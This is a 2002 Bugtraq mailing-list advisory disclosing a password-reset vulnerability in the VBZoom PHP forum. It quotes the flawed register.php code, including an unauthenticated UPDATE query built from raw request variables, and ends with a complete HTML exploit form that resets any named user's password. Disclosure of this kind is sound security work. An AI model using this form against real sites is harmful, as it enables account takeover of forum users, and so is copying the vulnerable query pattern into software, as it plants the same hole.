Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Reset any user's password in VBZoom forums

From: hish _ hish <hish_hish565 () hotmail com>
Date: 8 Oct 2002 19:41:07 -0000


Name:    VBZoom
Version Affected:  tested on v1.01 maybe other version vulnerable also
Severity:  Critical
Category: Password reset
Vendor URL:   http://www.vbzoom.com
Author:   hish_hish <hish_hish565 () hotmail com>
Date:   discloused on 28th August 2002
         Published at 8th oct 2002

Description
***********
VBZooM is bulletin board system which written in php,
the problem lay on sql query in file register.php.
and you can reset any user's password (see Details).
 
 
Details
*******
see these few lines from register.php:
1: If ($ChangeProfile==1 And ($VBZooMForumCookiesUserName=="" or 
2: $VBZooMForumCookiesUserName=="deleted"))
3: {
4: include("admin/config.php");
5: include("style/style.php");
6: Echo"<BR>";
 :
 :
9: include("login.php");   // wooow here will catch us, so we want to pass 
this block.
 :
 :
10: Exit();
11: }
 :
 :
14: if ($REQUEST_METHOD=="POST")
15: {
16: if($ChangeProfile==1 And $UserName!="")
17: {
18: include("admin/config.php");
19: $Connect =mysql_connect($DBHostName,$DBUserName,$DBPassword);
20: $Select =mysql_select_db($DBName,$Connect);
 :
 :
 :
24: $Sql = "UPDATE Member Set Password='$Password',Email='$Email',
      Gender='$Gender',Style='1',HomePage='$HomePage',Photo='$Photo',
       Icq='$Icq',Hotmail='$Hotmail',
      
Yahoo='$Yahoo',BirthDate='$BirthDate',Country='$Country',Hobby='$Hobby',
       Job='$Job',Signature='$Signature',AllowEmail='$AllowEmail',
      AllowMail='$AllowMail',AllowMessage='$AllowMessage',
      AllowMailCaseMessage='$AllowMailCaseMessage' where 
UserName='$UserName'";
31: $Result = mysql_query($Sql);
32: If ($Result)
 {
34: setcookie ("VBZooMForumCookiesUserName","$UserName",time()+604800);
35: setcookie ("VBZooMForumCookiesPassword", "$Password",time()+604800);

we don't want to execute the block between line 3 and 11 so we pass 
invalid values to if statment (line 1).
the lame sql statment lies at line 24 , and it's inside the block (line 14 
and 35).
so we will pass valid values to reach the sql statment as follow:
   make <form method="POST" action="register.php">  // to enter block in 
line 14
   assigne 1 to variable $ChangeProfile, and victim UserName to reset his 
password
   lines 18 - 20 no comment !!
   lines 24 - 35  :)
 
 
Exploit code
**************
<form name="f1" action="http://www.victim.com/vbzoom/register.php"; 
method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>
   
 
Fix Information
***************
Contact http://www.vbzoom.com
Previous By Date Next
Previous By Thread Next

Current thread: